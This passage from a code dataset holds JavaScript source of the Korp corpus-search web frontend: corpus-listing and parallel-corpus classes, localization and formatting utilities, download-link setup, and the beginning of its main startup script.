attrs2\n }\n\n return [attrNames, attrs]\n }\n\n _invalidateAttrs(attrs) {\n const union = this._mapping_union(attrs)\n const intersection = this._mapping_intersection(attrs)\n $.each(union, function (key, value) {\n if (intersection[key] == null) {\n value[\"disabled\"] = true\n } else {\n return delete value[\"disabled\"]\n }\n })\n\n return union\n }\n\n // returns true if coprus has all attrs, else false\n corpusHasAttrs(corpus, attrs) {\n for (let attr of attrs) {\n if (\n attr !== \"word\" &&\n !(\n attr in\n $.extend(\n {},\n this.struct[corpus].attributes,\n this.struct[corpus].structAttributes\n )\n )\n ) {\n return false\n }\n }\n return true\n }\n\n stringifySelected() {\n return _.map(this.selected, \"id\")\n .map((a) => a.toUpperCase())\n .join(\",\")\n }\n\n stringifyAll() {\n return _.map(this.corpora, \"id\")\n .map((a) => a.toUpperCase())\n .join(\",\")\n }\n\n getWithinKeys() {\n const struct = _.map(this.selected, (corpus) => _.keys(corpus.within))\n return _.union(...(struct || []))\n }\n\n getContextQueryStringFromCorpusId(corpus_ids, prefer, avoid) {\n const corpora = _.map(corpus_ids, (corpus_id) => settings.corpora[corpus_id.toLowerCase()])\n return this.getContextQueryStringFromCorpora(_.compact(corpora), prefer, avoid)\n }\n\n getContextQueryString(prefer, avoid) {\n return this.getContextQueryStringFromCorpora(this.selected, prefer, avoid)\n }\n\n getContextQueryStringFromCorpora(corpora, prefer, avoid) {\n const output = []\n for (let corpus of corpora) {\n const contexts = _.keys(corpus.context)\n if (!contexts.includes(prefer)) {\n if (contexts.length > 1 && contexts.includes(avoid)) {\n contexts.splice(contexts.indexOf(avoid), 1)\n }\n output.push(corpus.id.toUpperCase() + \":\" + contexts[0])\n }\n }\n return _(output).compact().join()\n }\n\n getWithinParameters() {\n const defaultWithin = locationSearch().within || _.keys(settings.defaultWithin)[0]\n\n const output = []\n for (let corpus of this.selected) {\n const withins = _.keys(corpus.within)\n if (!withins.includes(defaultWithin)) {\n output.push(corpus.id.toUpperCase() + \":\" + withins[0])\n }\n }\n const within = _(output).compact().join()\n return { default_within: defaultWithin, within }\n }\n\n getTimeInterval() {\n const all = _(this.selected)\n .map(\"time\")\n .filter((item) => item != null)\n .map(_.keys)\n .flatten()\n .map(Number)\n .sort((a, b) => a 
- b)\n .value()\n\n return [_.first(all), _.last(all)]\n }\n\n getMomentInterval() {\n let from, to\n const toUnix = (item) => item.unix()\n\n const infoGetter = (prop) => {\n return _(this.selected)\n .map(\"info\")\n .map(prop)\n .compact()\n .map((item) => moment(item))\n .value()\n }\n\n const froms = infoGetter(\"FirstDate\")\n const tos = infoGetter(\"LastDate\")\n\n if (!froms.length) {\n from = null\n } else {\n from = _.minBy(froms, toUnix)\n }\n if (!tos.length) {\n to = null\n } else {\n to = _.maxBy(tos, toUnix)\n }\n\n return [from, to]\n }\n\n getNonProtected() {\n return _.filter(this.corpora, (item) => !item.limitedAccess)\n }\n\n getTitle(corpus) {\n try {\n return this.struct[corpus].title\n } catch (e) {\n return c.log(\"gettitle broken\", corpus)\n }\n }\n\n getWordGroup(withCaseInsentive) {\n const word = {\n group: \"word\",\n value: \"word\",\n label: \"word\",\n }\n if (withCaseInsentive) {\n const wordInsensitive = {\n group: \"word\",\n value: \"word_insensitive\",\n label: \"word_insensitive\",\n }\n return [word, wordInsensitive]\n } else {\n return [word]\n }\n }\n\n getWordAttributeGroups(lang, setOperator) {\n let allAttrs\n if (setOperator === \"union\") {\n allAttrs = this.getCurrentAttributes(lang)\n } else {\n allAttrs = this.getCurrentAttributesIntersection()\n }\n\n const attrs = []\n for (let key in allAttrs) {\n const obj = allAttrs[key]\n if (obj.displayType !== \"hidden\") {\n attrs.push(_.extend({ group: \"word_attr\", value: key }, obj))\n }\n }\n return attrs\n }\n\n getStructAttributeGroups(lang, setOperator) {\n let allAttrs\n if (setOperator === \"union\") {\n allAttrs = this.getStructAttrs(lang)\n } else {\n allAttrs = this.getStructAttrsIntersection(lang)\n }\n\n const common_keys = _.compact(\n _.flatten(_.map(this.selected, (corp) => _.keys(corp.common_attributes)))\n )\n const common = _.pick(settings.commonStructTypes, ...common_keys)\n\n let sentAttrs = []\n const object = _.extend({}, common, allAttrs)\n for (let key in object) {\n const obj = object[key]\n if (obj.displayType !== \"hidden\") {\n sentAttrs.push(_.extend({ group: \"sentence_attr\", value: key }, obj))\n }\n }\n\n sentAttrs = _.sortBy(sentAttrs, (item) => util.getLocaleString(item.label))\n\n return sentAttrs\n }\n\n getAttributeGroups(lang) {\n const words = this.getWordGroup(false)\n const attrs = this.getWordAttributeGroups(lang, \"union\")\n const sentAttrs = this.getStructAttributeGroups(lang, \"union\")\n return words.concat(attrs, sentAttrs)\n }\n\n getStatsAttributeGroups(lang) {\n const words = this.getWordGroup(true)\n\n const wordOp = settings.reduceWordAttributeSelector || \"union\"\n const attrs = this.getWordAttributeGroups(lang, wordOp)\n\n const structOp = settings.reduceStructAttributeSelector || \"union\"\n const sentAttrs = this.getStructAttributeGroups(lang, structOp)\n\n return words.concat(attrs, sentAttrs)\n }\n}\n\nwindow.ParallelCorpusListing = class ParallelCorpusListing extends CorpusListing {\n constructor(corpora, activeLangs) {\n super(corpora)\n this.setActiveLangs(activeLangs)\n }\n\n select(idArray) {\n this.selected = []\n $.each(idArray, (i, id) => {\n const corp = this.struct[id]\n this.selected = this.selected.concat(this.getLinked(corp, true, false))\n })\n\n this.selected = _.uniq(this.selected)\n }\n\n setActiveLangs(langlist) {\n this.activeLangs = langlist\n }\n\n getReduceLang() {\n return this.activeLangs[0]\n }\n\n getCurrentAttributes(lang) {\n const corpora = _.filter(this.selected, (item) => item.lang === lang)\n const 
struct = _.reduce(corpora, (a, b) => $.extend({}, a.attributes, b.attributes), {})\n return struct\n }\n\n getStructAttrs(lang) {\n const corpora = _.filter(this.selected, (item) => item.lang === lang)\n const struct = _.reduce(\n corpora,\n (a, b) => $.extend({}, a.structAttributes, b.structAttributes),\n {}\n )\n $.each(struct, (key, val) => (val[\"isStructAttr\"] = true))\n\n return struct\n }\n\n getStructAttrsIntersection(lang) {\n const corpora = _.filter(this.selected, (item) => item.lang === lang)\n const attrs = _.map(corpora, function (corpus) {\n for (let key in corpus.structAttributes) {\n const value = corpus.structAttributes[key]\n value[\"isStructAttr\"] = true\n }\n\n return corpus.structAttributes\n })\n return this._mapping_intersection(attrs)\n }\n\n getLinked(corp, andSelf, only_selected) {\n if (andSelf == null) {\n andSelf = false\n }\n if (only_selected == null) {\n only_selected = true\n }\n const target = only_selected ? this.selected : this.struct\n let output = _.filter(target, (item) => (corp.linkedTo || []).includes(item.id))\n if (andSelf) {\n output = [corp].concat(output)\n }\n return output\n }\n\n getEnabledByLang(lang, andSelf, flatten) {\n if (andSelf == null) {\n andSelf = false\n }\n if (flatten == null) {\n flatten = true\n }\n const corps = _.filter(this.selected, (item) => item[\"lang\"] === lang)\n const output = _(corps)\n .map((item) => {\n return this.getLinked(item, andSelf)\n })\n .value()\n\n if (flatten) {\n return _.flatten(output)\n } else {\n return output\n }\n }\n\n getLinksFromLangs(activeLangs) {\n if (activeLangs.length === 1) {\n return this.getEnabledByLang(activeLangs[0], true, false)\n }\n // get the languages that are enabled given a list of active languages\n const main = _.filter(this.selected, (corp) => corp.lang === activeLangs[0])\n\n let output = []\n for (var lang of activeLangs.slice(1)) {\n const other = _.filter(this.selected, (corp) => corp.lang === lang)\n\n for (var cps of other) {\n const linked = _(main)\n .filter((mainCorpus) => mainCorpus.linkedTo.includes(cps.id))\n .value()\n\n output = output.concat(_.map(linked, (item) => [item, cps]))\n }\n }\n\n return output\n }\n\n getAttributeQuery(attr) {\n // gets the within and context queries\n\n const struct = this.getLinksFromLangs(this.activeLangs)\n const output = []\n $.each(struct, function (i, corps) {\n const mainId = corps[0].id.toUpperCase()\n const mainIsPivot = !!corps[0].pivot\n\n const other = corps.slice(1)\n\n const pair = _.map(other, function (corp) {\n let a\n if (mainIsPivot) {\n a = _.keys(corp[attr])[0]\n } else {\n a = _.keys(corps[0][attr])[0]\n }\n return mainId + \"|\" + corp.id.toUpperCase() + \":\" + a\n })\n return output.push(pair)\n })\n\n return output.join(\",\")\n }\n\n getContextQueryString() {\n return this.getAttributeQuery(\"context\")\n }\n\n getWithinParameters() {\n const defaultWithin = locationSearch().within || _.keys(settings.defaultWithin)[0]\n const within = this.getAttributeQuery(\"within\")\n return { default_within: defaultWithin, within }\n }\n\n stringifySelected(onlyMain) {\n let struct = this.getLinksFromLangs(this.activeLangs)\n if (onlyMain) {\n struct = _.map(struct, (pair) => {\n return _.filter(pair, (item) => {\n return item.lang === this.activeLangs[0]\n })\n })\n\n return _.map(_.flatten(struct), \"id\")\n .map((a) => a.toUpperCase())\n .join(\",\")\n }\n\n const output = []\n // $.each(struct, function(i, item) {\n for (let i = 0; i < struct.length; i++) {\n const item = struct[i]\n var main = 
item[0]\n\n const pair = _.map(\n item.slice(1),\n (corp) => main.id.toUpperCase() + \"|\" + corp.id.toUpperCase()\n )\n\n output.push(pair)\n }\n return output.join(\",\")\n }\n\n get(corpusID) {\n return this.struct[corpusID.split(\"|\")[1]]\n }\n\n getTitle(corpusID) {\n return this.struct[corpusID.split(\"|\")[1]].title\n }\n}\n\n// TODO never use this, remove when sure it is not used\nwindow.search = (obj, val) => window.locationSearch(obj, val)\n\nwindow.locationSearch = function (obj, val) {\n const s = angular.element(\"body\").scope()\n\n const ret = safeApply(s.$root, function () {\n if (!obj) {\n return s.$root.locationSearch()\n }\n if (_.isObject(obj)) {\n obj = _.extend({}, s.$root.locationSearch(), obj)\n return s.$root.locationSearch(obj)\n } else {\n return s.$root.locationSearch(obj, val)\n }\n })\n\n if (val === null) {\n window.onHashChange()\n }\n return ret\n}\n\nwindow.initLocales = function () {\n const packages = [\"locale\", \"corpora\"]\n const prefix = \"translations\"\n const defs = []\n let loc_data = {}\n window.loc_data = loc_data\n const def = $.Deferred()\n for (let lang of settings.languages) {\n loc_data[lang] = {}\n for (let pkg of packages) {\n ;(function (lang, pkg) {\n let file = pkg + \"-\" + lang + \".json\"\n file = prefix + \"/\" + file\n return defs.push(\n $.ajax({\n url: file,\n dataType: \"json\",\n cache: false,\n success(data) {\n return _.extend(loc_data[lang], data)\n },\n })\n )\n })(lang, pkg)\n }\n }\n\n $.when.apply($, defs).then(() => def.resolve(loc_data))\n\n return def\n}\n\nwindow.safeApply = function (scope, fn) {\n if (scope.$$phase || scope.$root.$$phase) {\n return fn(scope)\n } else {\n return scope.$apply(fn)\n }\n}\n\nwindow.util.setLogin = function () {\n for (let corp of authenticationProxy.loginObj.credentials) {\n $(`#hpcorpus_${corp.toLowerCase()}`).closest(\".boxdiv.disabled\").removeClass(\"disabled\")\n }\n if (window.corpusChooserInstance) {\n window.corpusChooserInstance.corpusChooser(\"updateAllStates\")\n }\n $(\".err_msg\", self).hide()\n}\n\nutil.SelectionManager = function () {\n this.selected = $()\n this.aux = $()\n}\n\nutil.SelectionManager.prototype.select = function (word, aux) {\n if (word == null || !word.length) {\n return\n }\n if (this.selected.length) {\n this.selected.removeClass(\"word_selected token_selected\")\n this.aux.removeClass(\"word_selected aux_selected\")\n }\n this.selected = word\n this.aux = aux || $()\n this.aux.addClass(\"word_selected aux_selected\")\n word.addClass(\"word_selected token_selected\")\n}\n\nutil.SelectionManager.prototype.deselect = function () {\n if (!this.selected.length) {\n return\n }\n this.selected.removeClass(\"word_selected token_selected\")\n this.selected = $()\n this.aux.removeClass(\"word_selected aux_selected\")\n this.aux = $()\n}\n\nutil.SelectionManager.prototype.hasSelected = function () {\n return this.selected.length > 0\n}\n\nutil.getLocaleString = (key, lang) => util.getLocaleStringUndefined(key, lang) || key\n\nutil.getLocaleStringUndefined = function (key, lang) {\n if (!lang) {\n lang = window.lang || settings.defaultLanguage || \"sv\"\n }\n try {\n return window.loc_data[lang][key]\n } catch (e) {\n return undefined\n }\n}\n\nutil.localize = function (root) {\n root = root || \"body\"\n $(root).localize()\n}\n\nutil.lemgramToString = function (lemgram, appendIndex) {\n lemgram = _.trim(lemgram)\n let infixIndex = \"\"\n let concept = lemgram\n infixIndex = \"\"\n let type = \"\"\n if (util.isLemgramId(lemgram)) {\n const match = 
util.splitLemgram(lemgram)\n if (appendIndex != null && match.index !== \"1\") {\n infixIndex = $.format(\"<sup>%s</sup>\", match.index)\n }\n concept = match.form.replace(/_/g, \" \")\n type = match.pos.slice(0, 2)\n }\n return $.format(\n \"%s%s <span class='wordclass_suffix'>(<span rel='localize[%s]'>%s</span>)</span>\",\n [concept, infixIndex, type, util.getLocaleString(type)]\n )\n}\n\nutil.saldoRegExp = /(.*?)\\.\\.(\\d\\d?)(:\\d+)?$/\nutil.saldoToString = function (saldoId, appendIndex) {\n const match = saldoId.match(util.saldoRegExp)\n let infixIndex = \"\"\n if (appendIndex != null && match[2] !== \"1\") {\n infixIndex = $.format(\"<sup>%s</sup>\", match[2])\n }\n return $.format(\"%s%s\", [match[1].replace(/_/g, \" \"), infixIndex])\n}\n\nutil.saldoToPlaceholderString = function (saldoId, appendIndex) {\n const match = saldoId.match(util.saldoRegExp)\n let infixIndex = \"\"\n if (appendIndex != null && match[2] !== \"1\") {\n infixIndex = $.format(\" (%s)\", match[2])\n }\n return $.format(\"%s%s\", [match[1].replace(/_/g, \" \"), infixIndex])\n}\n\nutil.lemgramRegexp = /\\.\\.\\w+\\.\\d\\d?(:\\d+)?$/\nutil.isLemgramId = (lemgram) => lemgram.search(util.lemgramRegexp) !== -1\n\nutil.splitLemgram = function (lemgram) {\n if (!util.isLemgramId(lemgram)) {\n throw new Error(`Input to util.splitLemgram is not a lemgram: ${lemgram}`)\n }\n const keys = [\"morph\", \"form\", \"pos\", \"index\", \"startIndex\"]\n const splitArray = lemgram.match(/((\\w+)--)?(.*?)\\.\\.(\\w+)\\.(\\d\\d?)(:\\d+)?$/).slice(2)\n return _.zipObject(keys, splitArray)\n}\n\n// Add download links for other formats, defined in\n// settings.downloadFormats (Jyrki Niemi <[email protected]>\n// 2014-02-26/04-30)\n\nutil.setDownloadLinks = function (xhr_settings, result_data) {\n // If some of the required parameters are null, return without\n // adding the download links.\n if (\n !(\n xhr_settings != null &&\n result_data != null &&\n result_data.corpus_order != null &&\n result_data.kwic != null\n )\n ) {\n c.log(\"failed to do setDownloadLinks\")\n return\n }\n\n if (result_data.hits === 0) {\n $(\"#download-links\").hide()\n return\n }\n\n $(\"#download-links\").show()\n\n // Get the number (index) of the corpus of the query result hit\n // number hit_num in the corpus order information of the query\n // result.\n const get_corpus_num = (hit_num) =>\n result_data.corpus_order.indexOf(result_data.kwic[hit_num].corpus)\n\n c.log(\"setDownloadLinks data:\", result_data)\n $(\"#download-links\").empty()\n // Corpora in the query result\n const result_corpora = result_data.corpus_order.slice(\n get_corpus_num(0),\n get_corpus_num(result_data.kwic.length - 1) + 1\n )\n // Settings of the corpora in the result, to be passed to the\n // download script\n const result_corpora_settings = {}\n let i = 0\n while (i < result_corpora.length) {\n const corpus_ids = result_corpora[i].toLowerCase().split(\"|\")\n let j = 0\n while (j < corpus_ids.length) {\n const corpus_id = corpus_ids[j]\n result_corpora_settings[corpus_id] = settings.corpora[corpus_id]\n j++\n }\n i++\n }\n $(\"#download-links\").append(\"<option value='init' rel='localize[download_kwic]'></option>\")\n i = 0\n while (i < settings.downloadFormats.length) {\n const format = settings.downloadFormats[i]\n // NOTE: Using attribute rel=\"localize[...]\" to localize the\n // title attribute requires a small change to\n // lib/jquery.localize.js. 
Without that, we could use\n // util.getLocaleString, but it would not change the\n // localizations immediately when switching languages but only\n // after reloading the page.\n // # title = util.getLocaleString('formatdescr_' + format)\n const option = $(`\\\n<option\n value=\"${format}\"\n title=\"${util.getLocaleString(`formatdescr_${format}`)}\"\n class=\"download_link\">${format.toUpperCase()}</option>\\\n`)\n\n const download_params = {\n // query_params: JSON.stringify($.deparam.querystring(xhr_settings.url)),\n query_params: xhr_settings.url,\n format,\n korp_url: window.location.href,\n korp_server_url: settings.korpBackendURL,\n corpus_config: JSON.stringify(result_corpora_settings),\n corpus_config_info_keys: [\"metadata\", \"licence\", \"homepage\", \"compiler\"].join(\",\"),\n urn_resolver: settings.urnResolver,\n }\n if (\"downloadFormatParams\" in settings) {\n if (\"*\" in settings.downloadFormatParams) {\n $.extend(download_params, settings.downloadFormatParams[\"*\"])\n }\n if (format in settings.downloadFormatParams) {\n $.extend(download_params, settings.downloadFormatParams[format])\n }\n }\n option.appendTo(\"#download-links\").data(\"params\", download_params)\n i++\n }\n $(\"#download-links\").off(\"change\")\n $(\"#download-links\")\n .localize()\n .click(false)\n .change(function (event) {\n const params = $(\":selected\", this).data(\"params\")\n if (!params) {\n return\n }\n $.generateFile(settings.downloadCgiScript, params)\n const self = $(this)\n return setTimeout(() => self.val(\"init\"), 1000)\n })\n}\n\nutil.searchHash = function (type, value) {\n locationSearch({\n search: type + \"|\" + value,\n page: 0,\n })\n}\n\nlet added_corpora_ids = []\nutil.loadCorporaFolderRecursive = function (first_level, folder) {\n let outHTML\n if (first_level) {\n outHTML = \"<ul>\"\n } else {\n outHTML = `<ul title=\"${folder.title}\" description=\"${escape(folder.description)}\">`\n }\n if (folder) {\n // This check makes the code work even if there isn't a ___settings.corporafolders = {};___ in config.js\n // Folders\n $.each(folder, function (fol, folVal) {\n if (fol !== \"contents\" && fol !== \"title\" && fol !== \"description\") {\n outHTML += `<li>${util.loadCorporaFolderRecursive(false, folVal)}</li>`\n }\n })\n\n // Corpora\n if (folder[\"contents\"] && folder[\"contents\"].length > 0) {\n $.each(folder.contents, function (key, value) {\n outHTML += `<li id=\"${value}\">${settings.corpora[value][\"title\"]}</li>`\n added_corpora_ids.push(value)\n })\n }\n }\n\n if (first_level) {\n // Add all corpora which have not been added to a corpus\n for (let val in settings.corpora) {\n let cont = false\n for (let usedid in added_corpora_ids) {\n if (added_corpora_ids[usedid] === val || settings.corpora[val].hide) {\n cont = true\n }\n }\n if (cont) {\n continue\n }\n\n // Add it anyway:\n outHTML += `<li id='${val}'>${settings.corpora[val].title}</li>`\n }\n }\n outHTML += \"</ul>\"\n return outHTML\n}\n\n// Helper function to turn \"8455999\" into \"8 455 999\"\nutil.prettyNumbers = function (numstring) {\n const regex = /(\\d+)(\\d{3})/\n let outStrNum = numstring.toString()\n while (regex.test(outStrNum)) {\n outStrNum = outStrNum.replace(\n regex,\n `$1<span rel=\"localize[util_numbergroupseparator]\">${util.getLocaleString(\n \"util_numbergroupseparator\"\n )}</span>$2`\n )\n }\n\n return outStrNum\n}\n\nutil.suffixedNumbers = function (num) {\n let out = \"\"\n if (num < 1000) {\n // 232\n out = num.toString()\n } else if (num >= 1000 && num < 1e6) {\n // 232,21K\n 
out = (num / 1000).toFixed(2).toString() + \"K\"\n } else if (num >= 1e6 && num < 1e9) {\n // 232,21M\n out = (num / 1e6).toFixed(2).toString() + \"M\"\n } else if (num >= 1e9 && num < 1e12) {\n // 232,21G\n out = (num / 1e9).toFixed(2).toString() + \"G\"\n } else if (num >= 1e12) {\n // 232,21T\n out = (num / 1e12).toFixed(2).toString() + \"T\"\n }\n return out.replace(\n \".\",\n `<span rel=\"localize[util_decimalseparator]\">${util.getLocaleString(\n \"util_decimalseparator\"\n )}</span>`\n )\n}\n\n// Goes through the settings.corporafolders and recursively adds the settings.corpora hierarchically to the corpus chooser widget\nutil.loadCorpora = function () {\n added_corpora_ids = []\n const outStr = util.loadCorporaFolderRecursive(true, settings.corporafolders)\n window.corpusChooserInstance = $(\"#corpusbox\")\n .corpusChooser({\n template: outStr,\n infoPopup(corpusID) {\n let baseLangSentenceHTML, baseLangTokenHTML, lang\n const corpusObj = settings.corpora[corpusID]\n let maybeInfo = \"\"\n if (corpusObj.description) {\n maybeInfo = `<br/><br/>${corpusObj.description}`\n }\n const numTokens = corpusObj.info.Size\n const baseLang = settings.corpora[corpusID] && settings.corpora[corpusID].linkedTo\n if (baseLang) {\n lang = ` (${util.getLocaleString(settings.corpora[corpusID].lang)})`\n baseLangTokenHTML = `${util.getLocaleString(\n \"corpselector_numberoftokens\"\n )}: <b>${util.prettyNumbers(settings.corpora[baseLang].info.Size)}\n</b> (${util.getLocaleString(settings.corpora[baseLang].lang)})<br/>\\\n`\n baseLangSentenceHTML = `${util.getLocaleString(\n \"corpselector_numberofsentences\"\n )}: <b>${util.prettyNumbers(settings.corpora[baseLang].info.Sentences)}\n</b> (${util.getLocaleString(settings.corpora[baseLang].lang)})<br/>\\\n`\n } else {\n lang = \"\"\n baseLangTokenHTML = \"\"\n baseLangSentenceHTML = \"\"\n }\n\n const numSentences = corpusObj[\"info\"][\"Sentences\"]\n let lastUpdate = corpusObj[\"info\"][\"Updated\"]\n if (!lastUpdate) {\n lastUpdate = \"?\"\n }\n let sentenceString = \"-\"\n if (numSentences) {\n sentenceString = util.prettyNumbers(numSentences.toString())\n }\n\n let output = `\\\n <b>\n <img class=\"popup_icon\" src=\"${korpIconImg}\" />\n ${corpusObj.title}\n </b>\n ${maybeInfo}\n <br/><br/>${baseLangTokenHTML}\n ${util.getLocaleString(\"corpselector_numberoftokens\")}:\n <b>${util.prettyNumbers(numTokens)}</b>${lang}\n <br/>${baseLangSentenceHTML}\n ${util.getLocaleString(\"corpselector_numberofsentences\")}:\n <b>${sentenceString}</b>${lang}\n <br/>\n ${util.getLocaleString(\"corpselector_lastupdate\")}:\n <b>${lastUpdate}</b>\n <br/><br/>`\n\n const supportsContext = _.keys(corpusObj.context).length > 1\n if (supportsContext) {\n output += $(\"<div>\").localeKey(\"corpselector_supports\").html() + \"<br>\"\n }\n if (corpusObj.limitedAccess) {\n output += $(\"<div>\").localeKey(\"corpselector_limited\").html()\n }\n return output\n },\n\n infoPopupFolder(indata) {\n const { corporaID } = indata\n const desc = indata.description\n let totalTokens = 0\n let totalSentences = 0\n let missingSentenceData = false\n $(corporaID).each(function (key, oneID) {\n totalTokens += parseInt(settings.corpora[oneID][\"info\"][\"Size\"])\n const oneCorpusSentences = settings.corpora[oneID][\"info\"][\"Sentences\"]\n if (oneCorpusSentences) {\n totalSentences += parseInt(oneCorpusSentences)\n } else {\n missingSentenceData = true\n }\n })\n\n let totalSentencesString = util.prettyNumbers(totalSentences.toString())\n if (missingSentenceData) {\n totalSentencesString 
+= \"+\"\n }\n let maybeInfo = \"\"\n if (desc && desc !== \"\") {\n maybeInfo = desc + \"<br/><br/>\"\n }\n let glueString = \"\"\n if (corporaID.length === 1) {\n glueString = util.getLocaleString(\"corpselector_corporawith_sing\")\n } else {\n glueString = util.getLocaleString(\"corpselector_corporawith_plur\")\n }\n return `<b><img src=\"${folderImg}\" style=\"margin-right:4px; \\\n vertical-align:middle; margin-top:-1px\"/>${\n indata.title\n }</b><br/><br/>${maybeInfo}<b>${\n corporaID.length\n }</b> ${glueString}:<br/><br/><b>${util.prettyNumbers(\n totalTokens.toString()\n )}</b> ${util.getLocaleString(\n \"corpselector_tokens\"\n )}<br/><b>${totalSentencesString}</b> ${util.getLocaleString(\n \"corpselector_sentences\"\n )}`\n },\n })\n .bind(\"corpuschooserchange\", function (evt, corpora) {\n safeApply($(\"body\").scope(), function (scope) {\n scope.$broadcast(\"corpuschooserchange\", corpora)\n })\n })\n const selected = corpusChooserInstance.corpusChooser(\"selectedItems\")\n settings.corpusListing.select(selected)\n}\n\nwindow.regescape = (s) => s.replace(/[.|?|+|*||'|()^$]/g, \"\\\\$&\").replace(/\"/g, '\"\"')\n\nwindow.unregescape = (s) => s.replace(/\\\\/g, \"\").replace(/\"\"/g, '\"')\n\nutil.formatDecimalString = function (x, mode, statsmode, stringOnly) {\n if (_.includes(x, \".\")) {\n const parts = x.split(\".\")\n const decimalSeparator = util.getLocaleString(\"util_decimalseparator\")\n if (stringOnly) {\n return parts[0] + decimalSeparator + parts[1]\n }\n if (mode) {\n return (\n util.prettyNumbers(parts[0]) +\n '<span rel=\"localize[util_decimalseparator]\">' +\n decimalSeparator +\n \"</span>\" +\n parts[1]\n )\n } else {\n return util.prettyNumbers(parts[0]) + decimalSeparator + parts[1]\n }\n } else {\n if (statsmode) {\n return x\n } else {\n return util.prettyNumbers(x)\n }\n }\n}\n\nutil.browserWarn = function () {\n $.reject({\n reject: {\n msie5: true,\n msie6: true,\n msie7: true,\n msie8: true,\n msie9: true,\n },\n\n imagePath: _.split(jRejectBackgroundImg, \"/\").slice(0, -1).join(\"/\"),\n display: [\"firefox\", \"chrome\", \"safari\", \"opera\"],\n browserInfo: {\n // Settings for which browsers to display\n firefox: {\n text: \"Firefox\", // Text below the icon\n url: \"http://www.mozilla.com/firefox/\",\n }, // URL For icon/text link\n\n safari: {\n text: \"Safari\",\n url: \"http://www.apple.com/safari/download/\",\n },\n\n opera: {\n text: \"Opera\",\n url: \"http://www.opera.com/download/\",\n },\n\n chrome: {\n text: \"Chrome\",\n url: \"http://www.google.com/chrome/\",\n },\n\n msie: {\n text: \"Internet Explorer\",\n url: \"http://www.microsoft.com/windows/Internet-explorer/\",\n },\n },\n\n header: \"Du använder en omodern webbläsare\", // Header of pop-up window\n paragraph1:\n \"Korp använder sig av moderna webbteknologier som inte stödjs av din webbläsare. En lista på de mest populära moderna alternativen visas nedan. Firefox rekommenderas varmt.\", // Paragraph 1\n paragraph2: \"\", // Paragraph 2\n closeMessage:\n \"Du kan fortsätta ändå – all funktionalitet är densamma – men så fort du önskar att Korp vore snyggare och snabbare är det bara att installera Firefox, det tar bara en minut.\", // Message displayed below closing link\n closeLink: \"Stäng varningen\", // Text for closing link\n // header: 'Did you know that your Internet Browser is out of date?', // Header of pop-up window\n // paragraph1: 'Your browser is out of date, and may not be compatible with our website. 
A list of the most popular web browsers can be found below.', // Paragraph 1\n // paragraph2: 'Just click on the icons to get to the download page', // Paragraph 2\n // closeMessage: 'By closing this window you acknowledge that your experience on this website may be degraded', // Message displayed below closing link\n // closeLink: 'Close This Window', // Text for closing link\n closeCookie: true, // If cookies should be used to remmember if the window was closed (see cookieSettings for more options)\n // Cookie settings are only used if closeCookie is true\n cookieSettings: {\n path: \"/\", // Path for the cookie to be saved on (should be root domain in most cases)\n expires: 100000,\n },\n }) // Expiration Date (in seconds), 0 (default) means it ends with the current session\n}\n\nwindow.__ = {}\nwindow.__.remove = function (arr, elem) {\n const index = arr.indexOf(elem)\n if (index !== -1) {\n return arr.splice(arr.indexOf(elem), 1)\n }\n}\n"
},
{
"alpha_fraction": 0.4333641827106476,
"alphanum_fraction": 0.4376060366630554,
"avg_line_length": 32.94240951538086,
"blob_id": "ad66544d2566807387d48fe6f74ffaea2c0ee26f",
"content_id": "d4b4b6132f41111cd99027992362072ff6f59cb7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12966,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 382,
"path": "/app/scripts/main.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst korpFailImg = require(\"../img/korp_fail.svg\")\nconst deparam = require(\"jquery-deparam\")\n\nimport jStorage from \"../lib/jstorage\"\n\nwindow.authenticationProxy = new model.AuthenticationProxy()\nwindow.timeProxy = new model.TimeProxy()\n\nconst creds = jStorage.get(\"creds\")\nif (creds) {\n authenticationProxy.loginObj = creds\n}\n\n// rewriting old url format to the angular one\nif (location.hash.length && location.hash[1] !== \"?\") {\n location.hash = `#?${_.trimStart(location.hash, \"#\")}`\n}\n\n$.ajaxSetup({\n dataType: \"json\",\n traditional: true,\n})\n\n$.ajaxPrefilter(\"json\", function (options) {\n if (options.crossDomain && !$.support.cors) {\n return \"jsonp\"\n }\n})\n\nconst deferred_domReady = $.Deferred(function (dfd) {\n $(function () {\n let { mode } = deparam(window.location.search.slice(1))\n if (!mode) {\n mode = \"default\"\n }\n return $.getScript(`modes/${mode}_mode.js`)\n .done(() => dfd.resolve())\n .fail((jqxhr, settings, exception) => c.error(\"Mode file parsing error: \", exception))\n })\n return dfd\n}).promise()\n\nconst loc_dfd = window.initLocales()\n$(document).keyup(function (event) {\n if (event.keyCode === 27) {\n if (kwicResults) {\n kwicResults.abort()\n }\n if (\"lemgramResults\" in window) {\n lemgramResults.abort()\n }\n if (statsResults) {\n statsResults.abort()\n }\n }\n})\n\n$.when(loc_dfd, deferred_domReady).then(\n function () {\n try {\n angular.bootstrap(document, [\"korpApp\"])\n } catch (error) {\n c.error(error)\n }\n\n try {\n const corpus = locationSearch()[\"corpus\"]\n if (corpus) {\n settings.corpusListing.select(corpus.split(\",\"))\n }\n view.updateSearchHistory()\n } catch (error1) {\n c.error(\"ERROR setting corpora from location\", error1)\n }\n\n if (isLab) {\n $(\"body\").addClass(\"lab\")\n }\n\n $(\"body\").addClass(`mode-${window.currentMode}`)\n util.browserWarn()\n\n $(\"#search_history\").change(function (event) {\n const target = $(this).find(\":selected\")\n if (_.includes([\"http://\", \"https:/\"], target.val().slice(0, 7))) {\n location.href = target.val()\n } else if (target.is(\".clear\")) {\n jStorage.set(\"searches\", [])\n view.updateSearchHistory()\n }\n })\n\n let prevFragment = {}\n // Note that this is _not_ window.onhashchange (lowercase only) and is not called by the browser\n window.onHashChange = function (event, isInit) {\n const hasChanged = (key) => prevFragment[key] !== locationSearch()[key]\n if (hasChanged(\"lang\")) {\n const newLang = locationSearch().lang || settings.defaultLanguage\n $(\"body\").scope().lang = newLang\n window.lang = newLang\n util.localize()\n\n $(\"#languages\").radioList(\"select\", newLang)\n }\n\n if (isInit) {\n util.localize()\n }\n\n prevFragment = _.extend({}, locationSearch())\n }\n\n $(\"#languages\").radioList({\n change() {\n const currentLang = $(this).radioList(\"getSelected\").data(\"mode\")\n locationSearch({\n lang: currentLang !== settings.defaultLanguage ? 
